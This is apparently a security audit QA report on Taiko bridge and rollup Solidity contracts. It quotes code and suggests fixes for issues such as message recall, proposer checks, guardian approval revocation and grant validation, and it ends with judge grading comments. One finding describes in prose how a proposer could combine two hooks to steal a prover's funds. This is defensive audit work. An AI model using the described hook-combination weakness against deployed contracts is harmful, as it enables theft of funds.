if (block.timestamp >= invocationDelay + receivedAt) { delete proofReceipt[msgHash]; messageStatus[msgHash] = Status.RECALLED; // Execute the recall logic based on the contract's support for the // IRecallableSender interface if (_message.from.supportsInterface(type(IRecallableSender).interfaceId)) { _storeContext(msgHash, address(this), _message.srcChainId); // Perform recall IRecallableSender(_message.from).onMessageRecalled{ value: _message.value }( _message, msgHash ); // Must reset the context after the message call _resetContext(); } else { _message.srcOwner.sendEther(_message.value); }
A user could prevent this from happening by implementing the interface before recallMessage()
is called and by doing so they can recover the intended message. If only message.from
can call recallMessage()
we allow for this.
If it is possible to set a designated relayer which guarantees that only they can call processMessage()
for a period of time we could possibly decrease the bridging fee since relayers don't have to compete and big against each other to be the first to call processMessage()
.
The designated relayer will have a a priori guarantee that they will receive the fee and it will therefore not have to pay to be the first to call processMessage()
.
When blobs are re-used the prover could end up committing to a large number of different blocks if they are not careful with their assignments
if (meta_.blobUsed) { if (!_config.blobAllowedForDA) revert L1_BLOB_FOR_DA_DISABLED(); if (params.blobHash != 0) { if (!_config.blobReuseEnabled) revert L1_BLOB_REUSE_DISABLED(); // We try to reuse an old blob if (!isBlobReusable(_state, _config, params.blobHash)) { revert L1_BLOB_NOT_REUSABLE(); } meta_.blobHash = params.blobHash; } else { // Always use the first blob in this transaction. If the // proposeBlock functions are called more than once in the same // L1 transaction, these multiple L2 blocks will share the same // blob. meta_.blobHash = blobhash(0); if (meta_.blobHash == 0) revert L1_BLOB_NOT_FOUND(); // Depends on the blob data price, it may not make sense to // cache the blob which costs 20,000 (sstore) + 631 (event) // extra gas. if (_config.blobReuseEnabled && params.cacheBlobForReuse) { _state.reusableBlobs[meta_.blobHash] = block.timestamp; emit BlobCached(meta_.blobHash); } } // Check that the txList data range is within the max size of a blob if (uint256(params.txListByteOffset) + params.txListByteSize > MAX_BYTES_PER_BLOB) { revert L1_TXLIST_OFFSET(); } meta_.txListByteOffset = params.txListByteOffset; meta_.txListByteSize = params.txListByteSize;
If the prover does not specify the metaHash, parentHash and sets loose boundaries on maxBlockID and maxProposeIn
block.timestamp > assignment.expiry || assignment.metaHash != 0 && _blk.metaHash != assignment.metaHash || assignment.parentMetaHash != 0 && _meta.parentMetaHash != assignment.parentMetaHash || assignment.maxBlockId != 0 && _meta.id > assignment.maxBlockId || assignment.maxProposedIn != 0 && block.number > assignment.maxProposedI
They can end up committing to multiple blocks of any subset of the transactions in the blob.
When proposing _isProposerPermitted()
is called to check if the proposer is permitted
function _isProposerPermitted( TaikoData.SlotB memory _slotB, IAddressResolver _resolver ) private view returns (bool) { if (_slotB.numBlocks == 1) { // Only proposer_one can propose the first block after genesis address proposerOne = _resolver.resolve("proposer_one", true); if (proposerOne != address(0) && msg.sender != proposerOne) { return false; } } address proposer = _resolver.resolve("proposer", true); return proposer == address(0) || msg.sender == proposer; } }
The second validation is unnecessary and could revert the call. We should not check if proposer = msg.sender
if proposerOne = msg.sender
for the first block. They could be different and this would revert this call.
if (_slotB.numBlocks == 1) { // Only proposer_one can propose the first block after genesis address proposerOne = _resolver.resolve("proposer_one", true); + if (msg.sender == proposerOne) {return true;}
If a guardian discovers that the have signed an incorrect hash or maybe if key have been stolen it would add extra security if a guardian could un-approve a previously approved hash
function approve( TaikoData.BlockMetadata calldata _meta, TaikoData.Transition calldata _tran, TaikoData.TierProof calldata _proof ) external whenNotPaused nonReentrant returns (bool approved_) { if (_proof.tier != LibTiers.TIER_GUARDIAN) revert INVALID_PROOF(); bytes32 hash = keccak256(abi.encode(_meta, _tran)); approved_ = approve(_meta.id, hash); if (approved_) { deleteApproval(hash); ITaikoL1(resolve("taiko", false)).proveBlock(_meta.id, abi.encode(_meta, _tran, _proof)); } emit GuardianApproval(msg.sender, _meta.id, _tran.blockHash, approved_); }
When granting validateGrant()
is called where we validate that the parameters for grant and unlock are valid
function _validateGrant(Grant memory _grant) private pure { if (_grant.amount == 0) revert INVALID_GRANT(); _validateCliff(_grant.grantStart, _grant.grantCliff, _grant.grantPeriod); _validateCliff(_grant.unlockStart, _grant.unlockCliff, _grant.unlockPeriod);
We do not validate between grant and unlock. E.g. an unlock with a cliff that is finished before the grant starts makes no sense and is a sign that the wrong parameters has been entered.
Provers and proposer will create their own hooks some of those hooks could interfere with each other.
En example of such a hook would be a hook that relies on swapping on a DEX to acquire TKO directly in the hook. The prover could allow the proposer to pass in arbitrary data to swap on an any DEX. The prover relies entirely on the check after the hook has executed to guarantee that the correct amount of TKO has been transferred
if (tko.balanceOf(address(this)) != tkoBalance + _config.livenessBond) { revert L1_LIVENESS_BOND_NOT_RECEIVED();
A proposer could potentially call both these hooks that are independently safe to steal funds from the prover.
Proposer calls both AssigmentHooks in the loop
for (uint256 i; i < params.hookCalls.length; ++i) { if (uint160(prevHook) >= uint160(params.hookCalls[i].hook)) { revert L1_INVALID_HOOK(); } // When a hook is called, all ether in this contract will be send to the hook. // If the ether sent to the hook is not used entirely, the hook shall send the Ether // back to this contract for the next hook to use. // Proposers shall choose use extra hooks wisely. IHook(params.hookCalls[i].hook).onBlockProposed{ value: address(this).balance }( blk, meta_, params.hookCalls[i].data ); prevHook = params.hookCalls[i].hook; } // Refund Ether if (address(this).balance != 0) { msg.sender.sendEther(address(this).balance); } // Check that after hooks, the Taiko Token balance of this contract // have increased by the same amount as _config.livenessBond (to prevent) // multiple draining payments by a malicious proposer nesting the same // hook. if (tko.balanceOf(address(this)) != tkoBalance + _config.livenessBond) { revert L1_LIVENESS_BOND_NOT_RECEIVED(); } }
Example:
AssigmentHook and DexAssigmentHook are both safe in isolation but when combined they can be used to steal funds from the prover.
There is of course also the requirement that the prover is actively using both AssigmentHook and that there is some overlap in the signed assignment such that both are valid at the same time.
We can protect against this by passing the entire hook array when calling
IHook(params.hookCalls[i].hook).onBlockProposed{ value: address(this).balance }( blk, meta_, params.hookCalls[i].data )
by doing so each AssigmentHook can add assignments to their signature that enforce a specific execution of hooks.
#0 - c4-pre-sort
2024-03-30T16:27:41Z
minhquanym marked the issue as sufficient quality report
#1 - minhquanym
2024-03-30T16:27:51Z
L-4 is dup of #274
#2 - c4-judge
2024-04-10T10:38:39Z
0xean marked the issue as grade-b